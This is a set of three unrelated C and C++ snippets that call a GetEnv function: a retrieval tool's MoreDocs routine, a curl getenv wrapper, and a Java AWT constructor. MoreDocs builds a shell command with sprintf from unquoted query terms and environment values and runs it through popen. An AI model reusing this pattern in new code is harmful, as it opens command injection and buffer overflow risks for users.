static void MoreDocs (query_data * qd, char *Query, char OutputType) { static char terms_str[MAXTERMSTRLEN + 1]; int DocCount = 0; /* number of actual matches */ FILE *Output = NULL; int using_pipe = 0; char *pager = NULL; Ctrl_C = 0; qd->num_of_ans = qd->DL->num; signal (SIGPIPE, SIGPIPE_handler); signal (SIGINT, SIGINT_handler); PagerRunning = 1; if (isatty (fileno (OutFile)) && GetEnv ("pager") && OutputType != OUTPUT_HILITE && OutputType != OUTPUT_SILENT && OutputType != OUTPUT_COUNT) { pager = GetEnv ("pager"); } else if (isatty (fileno (OutFile)) && OutputType == OUTPUT_HILITE) { /* concat the pager and its word argument strings */ ConvertTermsToString (qd->TL, terms_str); pager = Xmalloc (MAX_HILITE_PAGER_STR + strlen (terms_str) + 1); if (!pager) { fprintf (stderr, "Unable to allocate memory for highlighting\n"); return; } sprintf (pager, "%s --style=%s --pager=%s --stem_method=%ld %s", HILITE_PAGER, GetEnv ("hilite_style"), GetEnv ("pager"), qd->sd->sdh.stem_method, terms_str); } else { Output = OutFile; } if (pager) { Output = popen (pager, "w"); using_pipe = (Output != NULL); if (!using_pipe) { fprintf (stderr, "Unable to run \"%s\"\n", pager); return; } } if (qd->DL->num > 0) { if (OutputType == OUTPUT_COUNT && !post_proc) DocCount = qd->DL->num; else DocCount = ProcessDocs (qd, qd->DL->num, BooleanEnv (GetEnv ("verbatim"), 1), OutputType, Output); } if (PagerRunning) { output_terminator (Output); fflush (Output); } if (OutputType == OUTPUT_HILITE && pager) free (pager); /* as needed to malloc to create the pager string */ if (using_pipe) pclose (Output); if (qd->DL->num == 0) fprintf (stderr, "No entries correspond to that query.\n"); else { if (OutputType == OUTPUT_COUNT) fprintf (stderr, "%d documents match.\n", DocCount); else fprintf (stderr, "%d documents retrieved.\n", DocCount); } signal (SIGINT, SIG_DFL); }
char *curl_getenv(const char *v) { return GetEnv(v); }
AwtDesktopProperties::AwtDesktopProperties(jobject self) { this->self = GetEnv()->NewGlobalRef(self); GetEnv()->SetLongField( self, AwtDesktopProperties::pDataID, ptr_to_jlong(this) ); }